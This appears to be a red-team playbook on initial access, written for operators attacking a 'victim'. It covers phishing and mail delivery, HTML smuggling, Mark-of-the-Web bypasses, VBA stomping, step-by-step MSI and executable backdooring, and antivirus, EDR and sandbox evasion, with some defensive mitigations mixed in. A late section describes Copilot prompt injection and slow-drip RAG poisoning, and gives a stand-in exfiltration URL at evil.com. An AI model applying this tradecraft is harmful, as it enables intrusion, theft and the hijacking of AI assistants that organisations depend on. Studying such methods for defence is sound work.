Initial Access
Modern Initial Access
Introduction
Typical Initial Access Vectors
Email with malware attached/linked
Most attacks using attached malware won't work
Out of the box protection may not cover
PDF, ISO, IMG, HTML, SVG, PPTM, PPSM, ACCDEMost URL-based attacks do work
domain's reputation, age, category should be sound
domain should use https
limit number of GET elements and their names
use HTML Smuggling to evade
get your domain warmed up (send some legitimate emails first with no attachment and links)
Advanced attacks may involve delivering backdoored trusted applications (e.g., older Electron apps with V8 exploits) via phishing to bypass application control like WDAC.
Spear-phishing/ phishing / stealing valid credentials
Check your mail with Phishious before sending it to your victim
use decode-spam-headers to analyze returned SMTP headers
Be aware that default Microsoft Office settings now block macros in files downloaded from the internet (marked with
MOTW). Success often requires significant social engineering to convince users to bypass these protections or using alternative delivery methods (e.g., containers that don't propagateMOTW, signed add-ins).images and link increase spam score, be wary of it
don't use
no-replylike usernamessend through
GoPhis -> AWS SOCAT :587 -> smtp.gmail.com -> @target.comlink to websites on trusted domains, like cloud-facing resources
make sure your webserver blocks automated bots
Deep?fake voice or video social?engineering calls (help?desk or executive impersonation) to obtain password resets or approve MFA prompts.?Generative?AI tools make cloning voices trivial.
Business Email Compromise (BEC) / OAuth consent phishing that targets finance or vendor?portal users, yielding cloud?token access even where MFA is enabled.
Malicious OneNote
.oneattachments and OneDrive "Add to Shortcut" abuse: embedded HTA/JS payloads bypass Office macro blocking and spread via cloud sync.Excel blocks untrusted Internet-origin XLL add-ins by default (M365, 2023+). Smuggled XLLs inside containers may still be blocked once MOTW propagates.
Malicious browser extensions (Chrome, Edge, Firefox) delivered through fake Web Store listings; hijack session cookies or inject scripts into authenticated SaaS sessions.
attackers register malicious cloud apps and trick users into granting scopes, giving token-based access that bypasses MFA
Reusing stolen credentials against external single factor VPN, gateways, etc
Password Spraying against Office365, custom login pages, VPN gateways
Exposed RDP with weak credentials and lacking controls
Unpatched known vulnerable perimeter device, application bugs, default credentials, etc
Rarely HID-emulating USB sticks
WiFi Evil Twin -> Route WPA2 Enterprise -> NetNTLMv2 hash cracking -> authenticated network access -> Responder
Plugging into on-premises LAN -> Responder/mitm6/Ldaprelayx
SEO poisoning / paid?search malvertising (e.g., fake PuTTY & WinSCP ads, dominant loader delivery 2024�25) and "quishing" PDFs whose QR codes redirect victims to mobile OAuth login pages
Consent?/token?phishing and Adversary?in?the?Middle (AiTM) proxy kits that steal OAuth session cookies or proxy MFA (e.g., EvilProxy, Tycoon, Dadsec). These vectors bypass MFA by tricking users into granting access to rogue Azure AD / Google Workspace apps.
Supply?chain compromise of developer ecosystems:
malicious NPM / PyPI typosquat packages
poisoned GitHub Actions or CI/CD secrets exfiltration
container?registry deception (imageless Docker Hub repos or
curl | bashinstallers).First contact often occurs on developer workstations.
Mass?exploited perimeter and edge?device zero?days (e.g., Ivanti Connect Secure (such as CVE-2023-46805, CVE-2024-21887), MOVEit Transfer (such as CVE-2023-34362), Citrix Bleed) enabling unauthenticated remote code execution before credentials come into play. Maintain a live "current CVEs exploited?in?the?wild" table and apply virtual patching/WAF rules where upgrades lag.
Cloud & Kubernetes misconfigurations:
exposed S3 buckets allowing upload?then?execute objects
SSRF into EC2 IMDSv1 or GCP metadata to steal instance credentials
open Kubernetes API/Argo CD dashboards, and leaked Azure SAS tokens that grant cross?tenant data extraction.
OIDC Workload Identity Federation exposed: stolen GKE/EKS service?account tokens grant cross?cluster privilege escalation.
AWS STS credentials embedded in shareable URLs (
GetFederationToken, presigned S3, etc.) leak temporary keys to attackers.
Mobile initial?access vectors:
smishing or WhatsApp/Telegram lures
QR?code invoice/resum� phishing that lands on mobile browsers
rogue Mobile Device Management (MDM) enrolment profiles granting full device admin.
Passkey/WebAuthn phishing pages that spoof the biometric prompt to hijack FIDO sessions.
Sideload invitations via fake Apple TestFlight or Test Fairy links deliver malicious iOS/Android apps outside official store review.
Collaboration?app abuse:
malicious Microsoft Teams/Slack/Discord apps with overbroad OAuth scopes
slash?command token vacuum
SharePoint Framework (SPFx) app sideloading
Discord/Telegram CDN links hosting first?stage binaries.
If WinRM over HTTPS (WinRMS, port 5986) is enabled (it's not by default) and its Channel Binding setting remains at the default "Relaxed", it becomes vulnerable to NTLM relay attacks. Relayed credentials (e.g., from coerced HTTP/SMB/LDAP) can grant RCE. Ironically, enabling WinRMS to "harden" a system by disabling HTTP WinRM (port 5985, which is relay-resistant due to internal encryption) can introduce this vulnerability. Key technical details:
Standard WinRM (port 5985) uses HTTP with SPNEGO; channel binding is enabled by default, so NTLM relay fails unless the attacker controls TLS.
WinRMS (port 5986) runs over HTTPS; if
CbtHardeningLevelis not set to Strict, credentials can still be relayed despite TLS.Channel Binding (CBT) can be set to None (disabled), Relaxed (optional), or Strict (required)
Mitigation:
winrm set winrm/config/service/auth '@{CbtHardeningLevel="Strict"}'Prefer Kerberos or certificate-based auth for WinRM; monitor and reduce NTLM usage.
Exploiting misconfigured Power Platform services (e.g., Power Apps with overly permissive shared connections or abusing Power Query for native SQL execution against on-prem data gateways).
Command & Control
Use a two-stage Mythic C2 as our command and control
Stage one should be lean and hard to detect, it would be used for situational awareness
Stage two should be in-memory, inline-execute and feature reach
Nighthawk, Cobalt Strike, etc
Exec/DLL to SHELLCODE
For detailed information on converting executables and DLLs to shellcode, including:
Embedding shellcode into loaders
Backdooring legitimate PE executables
Tools like Donut, sRDI, Pe2shc and Amber
Open-source shellcode loaders like ScareCrow and NimPackt-v1
See the Shellcode documentation.
EDR Evasion Techniques
For detailed information on EDR evasion techniques, including:
Malware Virtualization
API Unhooking
Early Cascade Injection
Killing Bit techniques
Call Stack Obfuscation
Sleep Obfuscation
See the EDR Evasion documentation
Modern CyberDefense Stack
Secure Email Gateway / Email Security
FireEye MX
Cisco Email Security
TrendMicro for Email
MS Defender for Office365
Secure Web Gateway
Symantec BlueCoat
PaloAlto Proxy
Zscaler
FireEye NX
Secure DNS
Cisco Umbrella
DNSFilter
Akamai Enterprise Threat Protector
AntiVirus
McAfee
ESET
Symantec
BitDefender
Kaspersky
EDR
CrowdStrike Falcon
MS Defender for Endpoint
SentinelOne
VMware Carbon Black
Defensive quick?wins
Email/web controls
Enable Microsoft Defender for Office 365 Safe Links and Safe Attach (or vendor equivalent).
Block direct download of executable formats; detonate unknowns in sandbox.
Office hardening
Keep "Block macros from the Internet (MOTW)" enforced; prefer trusted locations.
Block XLL add?ins, unsigned COM add?ins, and legacy Excel 4.0 macros
ASR rules: Block Office child processes; Block Win32 API calls from Office; Block executable content from email and webmail; Block credential stealing from LSASS.
Browser/extension control
Enforce extension allowlists (Chrome/Edge/Firefox policy); disable developer mode on managed devices.
Identity & auth
Enforce MFA; restrict OAuth app consent (publisher verification + admin consent workflows); tenant restrictions.
Prefer phishing?resistant MFA (FIDO2/CTAP); block legacy/basic auth; monitor device?code flow abuse.
Endpoint policies
WDAC/Smart App Control or application allow?listing for untrusted installers (MSI/MSIX/ClickOnce).
Monitor and restrict PowerShell Constrained Language Mode exceptions; log script block.
For WinRM: prefer Kerberos/certificate auth; set WinRMS channel binding to Strict:
winrm set winrm/config/service/auth '@{CbtHardeningLevel="Strict"}'.
Security Controls Evasion
Perimeter Defense Evasion
Secure Web Gateway
sensitive on
Domain characteristics
URL-fetched contents (HTML, body, javascript)
MIME types (where file type is allowed or not)
can be evaded via
high reputation servers (cloud instances)
HTML smuggling
Secure DNS
sensitive on
Domain categorisation, maturity,
whoisexaminationPresence on real-time blocking lists, threat intelligence feeds, virustotal-alike databases
SSL/TLS certificate contents
can be evaded via
high reputation domains (Domain fronting CDN like azure edge CDN, Cloud-based resources like AWS lambda or azure blob storage, personal cloud drives)
use Talos Intelligence to check reputation
AWS is dumber than Azure, use it
Endpoint Defense Evasion
Antivirus
sensitive on
static signatures
heuristic signatures
behavioural signatures
trigger events
on-demand -> on-write -> on-access -> on-execute -> real-timeproactive protection of them is weaker due to low false-positive, low impact and high stability requirements
before-exec: mainly cloud-reputation based examination
before-exec: machine learning evaluation focusing on hand-picked characteristics
on-exec: simulating entry point and first N instructions
on-exec: memory scanner sweeping process virtual memory allocations for presence of signatured threats
steps
static analysis
heuristic analysis
cloud reputation analysis + automated sandboxing / detonation
ML analysis
emulation
behavioural analysis
can be evaded via
static analysis by writing custom malware
heuristic analysis by smartly blending-in with our payload
cloud reputation by backdooring legitimate binaries, devising malware in containers (PDF, Office docs), sticking to DLLs
automated sandboxing by environmental keying (only execute if something)
ML analysis by trial and error, hard to combat
emulation by time-delaying, environmental keying
behavioural analysis by
avoiding suspicious WinAPI calls
acting low-and-slow instead of all-at-once
unhooking/direct syscalls may work
EDR Evasion Techniques
For detailed information on EDR evasion techniques, including:
Malware Virtualization
API Unhooking
Early Cascade Injection
Killing Bit techniques
Call Stack Obfuscation
Sleep Obfuscation
Telemetry obfuscation
Persistence strategies
Event correlation evasion
See the EDR Evasion documentation.
Windows Defender Bypass Techniques
For detailed information on Windows Defender bypass techniques, including ASR bypasses and custom detection rules evasion, see the EDR Evasion documentation.
Hosting Payloads
Server Hosting our Payload must
Look benign, best if commonly used for file hosting
Have SSL/TLS certificate signed by trusted authority
Hard to be blocked by target (cloud based)
Example
Cloud-based file storage: Office365 OneDrive, SharePoint, AWS S3, MS Azure Storage, Google Drive, FireBase Storage
CDN: Azure Edge CDN, StackPath, Fastly, Akamai, Google Cloud AppSpot, HerokuApp
Serverless Endpoints: AWS Lambda, CloudFlare Workers, DigitalOcean Apps
use LOTS Project for help
use LOLBINS
prefer DLL over EXE
indirect execution to circumvent EDR/AV
DLL Side-Loading / DLL Hijacking / COM Hijacking / XLL
check Microsoft Block Rules to better circumvent defender
Infection Vectors and Chains
Classic File Infection Vectors
MAC
initial access is getting harder, for example for MAC you can still bypass
Unsigned apps (gets through with few clicks)
Office Macros +
.SLKExcel4 macros (constrained by gatekeeper)you can use Mystikal
Use
LNK, CHM, CPL, DLL, MSI, HTML, SVG; holdOffice w/macros, ISO, VHD, XSL.
Windows Script Host
VBE, VBS, JSE, JS, XSL, HTA, WSF
Mostly well detected and subject to AMSI detection. Effectiveness significantly reduced for Office macros due to default security settings blocking macros from the internet (
MOTW).Viable strategies for WSH scripts (often requiring MOTW bypass or user interaction):
File Dropper
download a file from internet/ UNC share or unpack from itself
save the file onto workstation
run the file directly/indirectly via LOLBIN
DotNetToJScript / GadgetToJScript
a way to deserialize and run
.NETexecutables in-memoryuse BinaryFormatter to deserialize them
XSL TransformNode
simple technique to run XSL/XML files in-memory while maintaining low IOC footprint
XLAM Dropper
Macro-enabled excel add-in file
when dropped to
%APPDATA%\Microsoft\Excel\XLSTART, they are auto-executed when starting excel
Microsoft Compiled Help Messages
can be used to run a system command whenever user browses into them
some used to run VBS or quietly install MSI
LNK
EXE/ZIP embedded into LNK
can be polyglot-ted with
HTA/ISO/PDF/ZIP/RAR/7zuse icons to weaponize, inspect with LEcmd to make sure not disclosing MAC & hostname
always run through a LOLBIN like
conhost.exe
HTML Smuggling
body
onloadcallbackoptional
setTimeoutdelay or direct entrypoint callembedded payload footprint
actual logic
create a JavaScript
Blobobject holding raw file dataif operating on IE use
msSaveOrOpenBlobelse, create a dynamic
<a style="display:none"></a>HTML nodeinvoke
URL.createObjectURL()and set<a href="...">set download name via
<a>.downloadprogrammatically click the anchor to trigger the download
use detect-headless to identify sandboxes
run anti-headless logic after some time elapses
Can bypass most secure gateways, but the downloaded file (e.g., ISO, ZIP, LNK, document) still faces endpoint scrutiny. If the smuggled file relies on macros (e.g.,
.docm), it will likely be blocked by default Office security unless the user explicitly enables content.
COM Hijack
every VBA strategy requires launcher and often needs to overcome default macro security blocks:
WScript.ShellWMI Win32_Process::CreateShell(...)etc
Complex Infection Chains
Containerized Malware
Files downloaded from internet have Mark of the Web(
MOTW) taint flagDefault Behavior: Office documents having
MOTWflag have their macros blocked by default, preventing automatic execution. This is a major mitigation against traditional macro-based attacks.You can download it from intranet or trusted locations to circumvent this (less common for initial access).
Some container file formats do not propagate
MOTWflag to inner files when extracted, providing a potential bypass:ISO / IMG
7zip
CAB
VHD / VHDX
WIM
check MOTW Comparison to make sure
[!Note] (Windows 11 22H2+): ISOs opened via double-click in Explorer inherit MOTW. Using
Mount-DiskImagevia PowerShell typically avoids propagation; validate on your build.
Chains Recipe
In?the?wild sample
Spear-Phishing
Link in mail or Link in PDF
HTML Smuggling drops ISO or ZIP
ZIP contains
RTLO?tricked.EXEdisguised as.PDFbeing legit 7?Zip executable.PDF.EXEwhen clicked, sideloads benignvcruntime140.dllthat imports evil7za.dll
ISO contains
LNK+ DLL.LNKrunsrundll32 evil.dll,SomeExport
Delivery - convey your chain (HTML smuggling drop in drive-by download fashion)
Container - archive bundling all infection files
ISO/IMG/ZIPcan contain hidden files
Trigger - some way to run our payload (
LNK/CHM)Payload - our malware
Note: Macro-enabled office documents (
.docm,.xlsm) are less reliable for initial execution due toMOTWblocks unless combined with social engineering or specific bypasses.can be macro-enabled office document with
MOTWstripped (e.g., delivered inside a container like ISO/VHD)DLL/CPL/XLLto be loaded by trigger directly or indirectly with LOLBIN (XLLs also subject toMOTWblocking if downloaded directly)XLAMto be copied toXLSTARTfor persistence & abusing office trusted pathMSI/MSPto run during silent installation (MOTWstripped)VbaProject.OTMfor outlook persistence.EXE + .DLLexecuting through side-loading attack
Decoy - keep your victim happy by displaying some interesting stuff
Successful Strategies
VBA Infection Strategies
Important Note: The effectiveness of traditional VBA macro execution on document open (
AutoOpen,Document_Open) is significantly diminished due to Microsoft's default security policy blocking macros in files downloaded from the internet (MOTW). Successful execution often requires social engineering to have the user explicitly trust the document/location or alternative execution methods (like COM hijacking triggered later, Add-Ins, etc.).Alt+F11IM- quickly inserts VBA module into a documentabuse path
execute
file dropper
COM hijack
DotNetToJScript
use of WinAPI is strongly inadvisable due to detection
GetUserNameAmight be fine but things likeCreateProcessAis a big no-noAutoOpen,Document_Open, etccan be used to auto-run our script
Attack Surface Reduction Rules
Set of policies enforced by Microsoft Defender Exploit Guard attempting to contain malicious activities
Execute
Most basic strategy is to simply run some command with LOLBIN. Subject to macro execution policies.
Avoid running immediately; prefer persistence. Consider COM/DLL hijacking and always use LOLBINs.
useful ones
Wscript.Shell.Exec- prefix withobf_to facilitate later obfuscationInvokeVerbEx- evades detection but sometimes doesn't work with LOLBINRDS.DataSpace- supposed to be obsolete, but still works
use AMSITools to review AMSI events
DotNetToJScript
DotNetToJScript- runs.NETassemblies in-memory throughAssembly.Load. Still requires the initial VBA/JScript execution, which is often blocked.
File Dropper
Deadly as long as AV/EDR not detect our dropped payload
OnWrite. The initial macro execution to drop the file is the primary hurdle due to default security.files can be pulled from
internet
office file structures
inside VBA code itself - not good
COM Hijack
Plants dodgy COM server via registry key in
HKCUthat overridesHKLMsystem defaults. This is a persistence/later execution technique, bypassing the initial macro block issue, but the initial planting still needs to occur.create registry key structure using VBA
drop a DLL file to HDD
wait until system/application picks that COM object up and instantiate it
beware your DLL might be executed hundreds time per minute
implement single-instance / single-run logic
don't hijack
MMDeviceEnumerator, user sees issuesuse
CacheTask->{0358B920-0AC7-98F4-58E32CD89148}learn more here
Lures
Present plausible pretext that gets removed after macros run ( like
docusignor adjust to your version). Modern lures often need to convince the user to click "Enable Content" or move the file to a trusted location.we can leverage shapes (images, text boxes, macro cycles through them)
big blob of shellcode embedded in VBA stands out
we can use
shellcode or commands in document properties
word variables
word/excel/powerpoint parts
VBA forms
spreadsheet cells
Word
ActiveDocument.Paragraphs
Alternative AutoRuns
Proxy sandboxes like
Zscalerare sensitive toAuto_Open(), that might give away our maldoc. These autoruns are also subject to the default macro blocking policies.Workboot_SheetCalculate += RAND()might be usefulMS Word Remote Templates are a good choice as well
Office offers customizing ribbon based on
CustomUI XML; we can abuse theonLoadpart as wellActiveX controls can be inserted into document, but will be called a lot so keep it simple. Also subject to security controls.
Exotic VBA Carriers
MS Office
Access
.accde, .mdb, PowerPoint, Publisher.pubVisio
.vsdm, Visio97.vsd, MS Project.mppPublisher RTF files
Outlook
ThisOutLookSession,VBAProject.OTM
SCADA Systems
Siemens SIMATIC HMI WinCC
General Electric HMI Scada iFix
IGSS schneider-electric
CAD Software
VBA Module for AutoCAD / VBA Manager in AutoCAD 2021
ProgeCAD Professional
SOLIDWORKS
.swp,.swbVBA Project filesDS CATIA V5
Bentley MicroStation CONNECT
.MVBAfiles
Others
ArcMap
.MXTfilesOscilloscopes Keysight E5071C Network Analyzer
TIBCO Statistica Visual Basic
.SVBanalysis configurationRocket Terminal Emulator
MicroFocus InfoConnect Desktop
VBA Stream Manipulation
VBA macros are stored in
vbaProject.binOLE stream moduleseach module consists of
PerformanceCache- compiled VBA code, office version specificCompressedSourceCode- compressed VBA with MS proprietary algorithm
VBA Stomping relies on the fact that Office prefers executing
PerformanceCacheif its version matches, so we can use malicious performance cache and innocuous compressed code. Detection for stomping has improved, and the macro execution itself is still subject to security policies.EvilClippyoffers other useful features as wellHide VBA from GUI
Remove metadata stream
Set random module names
Make VBA Project unviewable/locked
EvilClippy.exe -s fakecode.vba -t 2016x8666 macrofile.doc
VBA Purging
removes
PerformanceCachefrom module and_VBA_PROJECTstreamschanges
MODULEOFFSETto 0removes all
__SRP_#streamsthis removes strings representing VBA code parts, lowering detection potential
Evasion Tactics
Uglify - remove empty lines, add random indentation, insert garbage code & comments
Rename variables and function/sub names
Randomize functions order
Obfuscate strings
Avoid overly long lines
Payload obfuscation is trickier
Sandbox Evasion
detect if running in sandbox environment, don't run any further. Doesn't bypass the default user-facing macro block.
validation of username/domain
uptime check
internet-exposed IPv4 geolocation & reverse?PTR
weaker stuff (hardware,process list, NIC MAC addresses)
Office Files Encryption
Powerful evasion technique against static analysis but does not bypass the runtime macro execution blocks based on
MOTW.Office documents can be password-protected / encrypted
Excel always tries hardcoded password value of
VelvetSweatshopPowerpoint always tries
/01Hannes Ruescher/01use
msoffice-crypt.exe
Office trusted path + AMSI evasion
Relies on getting the file into a trusted path first, bypassing the initial MOTW block.
requires disabling/patching optics
sometimes works
checkout zip motw for a sample MOTW evasion
MSI Shenanigans
Installation
MSI installer can be built with WiX toolset, which brings us several properties
there is a
<CustomAction>tag letting us run.DLL, .EXE, .VBScript/JscriptAfter installation we can safely uninstall MSI, leaving no trace on HDD
Can run
inner
VBScript/JScriptin-memoryinner
.NET assemblyin-memoryinner
EXEfile by extracting it toC:\Windows\Installer\MSIXXXX.tmp
when running
EXE, parent-child relationship gets dechained intowininit.exe -> services.exe -> msiexec.exe -> MSIxxxx.tmp
Types
.MSI- compound storage file format comprising of a set of databases structured inOLEformat.MSP- Windows installer patch file.MSM- Windows merge module installer's file (not usable).MST- Windows installer transformation fileFiles are stored in
.CABarchives, that are bundled intoMSImedia tableORCA&MSISnatcherlets us backdoor existing MSI file
Manual
compile
WXSintoWIXOBJlinks
WIXOBJintoMSI
use
rogue-dot-net\generateRouteDotNet.pyto compile custom.NETDLL based off shellcodecreate self-exctractable, standalone
.NETCustomAction DLL with WiX MakeSfxCacompile
WXSintoWIXOBJlink
WIXOBJintoMSI
install, wait, uninstall
Backdoor Existing MSI
we can add rows to existing MSI thus backdooring it
Interesting Fields
Binary - table that holds binary data in-memory during MSI installation
CustomAction - actions to perform pre/post installation
InstallExecuteSequence - sequence-ordered list of actions that take place during installation
File - files to be extracted into system
Component - describes into which directory should file be extracted
Media - CAB files inside of MSI
Registry - Contains all registry keys & values to be created
Shortcut - scatters LNK all around the system
Process
copy
putty-installer.msitobackdoored.msiopen
orca.exeand openbackdorred.msiinside ittables -> CustomAction -> right click -> add row ->
Action=whatever1, type=1250, source=INSTALLDIR, target=calctables -> InstallExecuteSequence -> sort tables by
Sequencecolumn -> add row ->Action=whatever1, condition= NOT REMOVE, sequence = 6599file -> save as ->
backdoored.msitest it
we can automate the process using
MSISnatcher
Windows App Package Format
.MSIXwhich supersedes.MSIby enforcing publisher authentication via code signing certificateinstalled
.APPX/.MSIXgoes into%ProgramFiles%\WindowsApps\<PublisherName>.<AppName>_<AppVersion>_<Arch>_<Hash>extensions
MSIXthe zip of signed installation packageAPPXa directory containingEXECUTABLES/Program,.AppxManifest.xml,[Content_Types.xml], assets, icons, other filesAPPXBUNDLE,MSIBUNDLEcontains.APPX/.MSIXand other filesAPPINSTALLER- XML file pointing towards.APPXBUNDLEor.MSIXinstallers
deployment
double-click
windows store
browsing a website with
ms-appinstallerlinkvia PowerShell
Add-Package -Path .\evil.appxvia remote host through
DCOM- checkout ProvisionAppxa static Azure blob storage website -> HTML with
ms-appinstallerURL handler -> use a signed binary (179$)
Executables
Basics
Static Detection
Static Detection is simplest to evade, simply use packers
PE Protector- encrypt & anti-debug/anti-xPE Compressor- reduce the file size.NET Obfuscators- protect IP, symbol names, stringsScript Obfuscators- VBA/VBScript, PowerShell,BATVirtualizers- translate input PE executable machine code into custom VMExecutable Signers- steal genuineEXEcertificate + properties and apply on implantResource Editors- remove Icon, version informationShellcode Loaders- load shellcode in a stealthilyShellcode Encoders-Shikata Ga Nai
you can use ProtectMyTooling for various packers
Note on Online Scanners: While services like AntiScan.Me can give an initial idea of detection rates, they don't replace testing against a local, isolated machine representative of the target environment. Defenses like Windows Defender may behave differently in a real system compared to online sandboxes.
Targeted Evasion: Aiming for a universal "0 detection rate" can be time-consuming. It's often more effective to gather intelligence on the target's specific security solutions and focus evasion efforts accordingly.
Offensive CI/CD Pipeline
RedTeam Malware Development
Test Stability, Reliability, Security
Artifact Obfuscation
Test Against Offline EDR
Watermarking & IOC Collection
Operational Use
Implant Tracking in Threat Intelligence Feeds
PE Backdoor
Inject Shellcode Into Legitimate Executable
middle of current code section
into separate section
Redirect Execution
change
AdressOfEntryPointHijack branching call
JMP, CALLTLS Callback
Sign it With Self-signed/Custom Authentication
LimeLighterMangleScareCrowosslsigncode.exe
Spoofed Certificates: Signing an implant, even with a spoofed or invalid certificate, can sometimes reduce detection by AVs that don't thoroughly validate the certificate chain. However, be aware of potential legal consequences.
Timestamping: The choice of Time Stamp Authority (TSA) server when signing can also unexpectedly influence detection rates by different AV products.
PE Watermarking
Keep Track of implant/malware/IOC
Inject Custom Watermark to Payloads and Poll VirusTotal
Where to Inject
DOS Stub
PE Header Properties: TimeStamp, Checksum
Overlay
Additional PE Section
Resources: Version Information, Manifest
What Should it Look Like
Random SHA256 might be enough
Encrypted engagement metadata
PE Attribute Cloning and Code Signing Considerations
Cloning Attributes: Copying file attributes (version information, icons, product names, original filenames, etc.) from legitimate binaries can help an implant blend in.
When cloning, choose binaries that are legitimately present and commonly used on the target system. For instance, cloning an iTunes binary for a Windows Server target would be suspicious.
Consider cloning attributes from unsigned legitimate Windows binaries (e.g.,
at.exe) and not signing the implant. This may be more effective than cloning a signed binary (likeRuntimeBroker.exe) and then signing the implant with a spoofed certificate, especially if the EDR/AV can easily verify signatures of its own system's binaries.
Testing is Crucial: Always test cloned and/or signed implants on a system mimicking the target environment, as behavior can differ significantly from online scanning services.
Shellcode
For detailed information on shellcode loaders, techniques, and implementation, including:
Allocation, write, and execution phases
Local vs remote injection
Methods to hide shellcode
Storage solutions (including Certificate Table approach)
See the Shellcode documentation.
Formats
EXEuse
EV Certcode signing if you can afford itotherwise self-signed
LimeLighter,ScareCrow,osslsigncode
DLLtypical no subject for prevalence/reputation score
offer delayed & de-chained execution primitives
not visible in process list
facilitate DLL hijacking attacks
can be used by
LOLBINcleanup is hard, to remove first need to exit threads and then free that library
call
kernel32!FreeLibraryAndExitThreadwhen your evil DLL execution is donekeep
DLLMainas simple as possible, or better don't used it at all, use the bullet point belowDLL hijacking/proxying/side-loading/planting/search-order hijacking to evade detection
for DLL Side-Loading use
Frida+WFH,Koppeling,SiofraorSpartacusandCrassusBeware MS Defender might trigger on DLL Side-Loading/Hijacking
CPLcontrol panel applet
double-clickable
WLLword add-in
not double-clickable
XLLexcel add-in
double-clickable
if has
MOTWgets blocked
Additional Evasion Techniques
For detailed information on EDR evasion techniques, including:
String obfuscation
Entropy manipulation and file bloating
Time-delayed execution
Sandbox detection and environmental keying
AMSI and ETW evasion
Call stack obfuscation
DripLoader technique
See the EDR Evasion documentation.
Emerging Initial-Access
Cloud identity & OAuth token theft (AiTM proxy kits, consent phishing, pass?the?cookie).
MFA fatigue / prompt bombing.
Exploiting edge devices & perimeter zero?days (Ivanti, Citrix, Fortinet, Atlassian, etc.).
Third?party package & CI/CD compromise (malicious NPM/PyPI, GitHub Actions secrets).
Cloud & Kubernetes misconfigurations (IMDS SSRF, public buckets, SAS token leaks, exposed dashboards).
Mobile & QR?code phishing / rogue MDM enrolment.
Collaboration & chat?app abuse (Teams, Slack, Discord, SharePoint Framework sideloading).
Firmware & driver implants � malicious signed drivers, kernel PAP bypasses (Pluton, DRTM).
LLM ecosystem abuse: malicious prompt?injection browser extensions, poisoned fine?tuned model weights, or compromised RAG pipelines that plant backdoors in AI?assisted workflows.
Exploiting misconfigured Power Platform services (e.g., Power Apps with overly permissive shared connections or abusing Power Query for native SQL execution against on-prem data gateways).
Malvertising & Trojanized Tools
Widespread SEO/malvertising campaigns promote trojanized installers for PuTTY, WinSCP, and GitHub Desktop. Campaigns observed in 2025 include Oyster/CleanUpLoader/Broomstick and GitHub?hosted signed payloads.
Common flow: Sponsored/ad result ? look?alike site ? signed loader ? staged payloads (stealers, loaders, ransomware precursors).
Practical mitigations:
Prefer vendor domains and block sponsored results for admin tooling where possible.
Require known publishers for installer execution (WDAC/AppControl); warn on newly observed certs.
Hunt for typosquatted domains, installers spawning DPAPI access and named pipes shortly after install.
AiTM & OAuth Consent Phishing
PhaaS kits (EvilProxy/Evilginx/Tycoon) proxy MFA and harvest session cookies; consent phishing grants persistent access via OAuth scopes.
Device?code phishing variants coordinate over chat to race the code window and complete sign?in.
Practical mitigations:
Enforce publisher verification + admin consent workflows; disable user consent where not needed; monitor consent grants.
Enable token protection/binding where available; reduce sign?in session lifetimes; restrict refresh tokens on risky sign?ins.
Block legacy/basic auth; require phishing?resistant MFA (FIDO2/CTAP); enforce CA policies on device compliance/location.
Detect: unexpected
prompt=noneflows, unusual consent grants, and cookie?only sessions without credential submissions.
AI/LLM-Powered Initial Access
The rapid adoption of enterprise AI tools creates novel initial-access vectors through prompt injection, poisoned training data, and compromised AI pipelines.
Microsoft 365 Copilot Prompt Injection
Attack Vector: Poison SharePoint documents indexed by Copilot to execute hidden instructions when queried by users.
Technique:
Delivery Methods:
Upload poisoned documents to high-traffic SharePoint sites
Inject into wikis, OneNote notebooks, or collaborative spaces
Hide instructions in document properties or alternate data streams
Use Unicode zero-width characters to hide directives
Impact:
Credential harvesting when users click generated links
Data exfiltration via Copilot's web request capabilities
Social engineering at scale (Copilot generates convincing phishing messages)
Lateral movement (Copilot accesses files user has permissions for)
Example Copilot Poisoning:
RAG (Retrieval Augmented Generation) Database Poisoning
Concept: Insert malicious documents into vector databases (Pinecone, Weaviate, Chroma) used by LangChain/LlamaIndex applications.
Attack Workflow:
Identify Target RAG System:
Company knowledge bases (Confluence, Notion exports)
Internal documentation sites
Customer support chatbots
HR/policy Q&A systems
Craft Adversarial Embeddings:
Documents rank highly for common corporate queries
Use semantic manipulation to boost retrieval scores
Embed malicious instructions in high-similarity contexts
Injection Methods:
Contribute to public wikis/repos the company indexes
Upload to shared drives that feed the RAG pipeline
Submit via "suggest edit" features on documentation sites
Exploit unvalidated user-generated content
Example Poisoned Document:
Detection Evasion:
Embeddings bypass traditional DLP (text not directly visible to scanners)
Semantic search rankings manipulated via adversarial examples
Legitimate-looking content passes manual review
Slow-drip poisoning over months avoids anomaly detection
LangChain/LlamaIndex Exploitation
Vulnerability Classes:
Arbitrary Code Execution via Tools:
SSRF via Document Loaders:
LangChain's
UnstructuredURLLoaderfetches attacker-controlled URLsExfiltrate internal documents via callbacks:
http://evil.com/?doc={{retrieved_content}}
Prompt Injection via Function Calling:
Experimental (Research): Passkey/WebAuthn PRF Phishing
[!CAUTION] The following PRF (hmac?secret) abuse ideas are research?grade and highly build?dependent. Public, reproducible evidence is limited; treat as experimental and validate in a lab.
Use AI to generate convincing phishing sites in real-time
WebAuthn PRF (hmac-secret) Abuse:
Reverse Proxy Passkey Phishing (Evilginx 3.0+):
Proxy sits between victim and real site
Forwards WebAuthn challenges
Steals session cookies post-authentication
Bypasses FIDO2/passkey protection
LLM-Powered Autonomous Penetration Testing
Large language models enable fully autonomous initial access and exploitation:
RapidPen Framework and Similar Tools Capabilities
Autonomous vulnerability discovery without human intervention
Real-time adaptation to target responses and defenses
Shell access achievement through multi-step exploitation chains
Automated reconnaissance, enumeration, and privilege escalation
Natural language understanding of application behavior
Technical Implementation
Attack Chain Automation:
Target Analysis:
LLM analyzes target website/application
Identifies technology stack from responses
Plans attack strategy based on findings
Prioritizes high-value vulnerabilities
Vulnerability Discovery:
Generates test cases based on common patterns
Adapts payloads based on WAF/filtering responses
Learns from failed attempts
Discovers zero-day-like vulnerabilities through fuzzing
Exploitation:
Generates exploit code in real-time
Handles errors and edge cases
Bypasses basic security controls through iteration
Achieves code execution or data access
Post-Exploitation:
Establishes persistent access
Conducts lateral movement
Exfiltrates sensitive data
Covers tracks and removes indicators
Persistent Cross-Session Injection
Semantic Search Manipulation:
Attackers craft documents with embeddings that rank highly for targeted queries:
Embedding Space Obfuscation:
Long-Term RAG Database Poisoning
Slow-Drip Strategy:
Upload hundreds of benign documents over months
Gradually inject subtle malicious instructions
Build trust and authority in vector database
Activate attack instructions when critical mass reached
Detection Evasion:
Spread malicious content across multiple documents
Use semantic similarity to hide patterns
Employ steganography in metadata
Rotate attack vectors to avoid signatures
Cross-Document Instruction Chaining:
Others
Social Engineering
Attack Mechanics
IT help desk impersonation via phone/VoIP/Teams calls
Microsoft Quick Assist and legitimate RMM tool abuse
Combines with spam bombing for urgency creation
Integrates with MFA fatigue/prompt bombing tactics
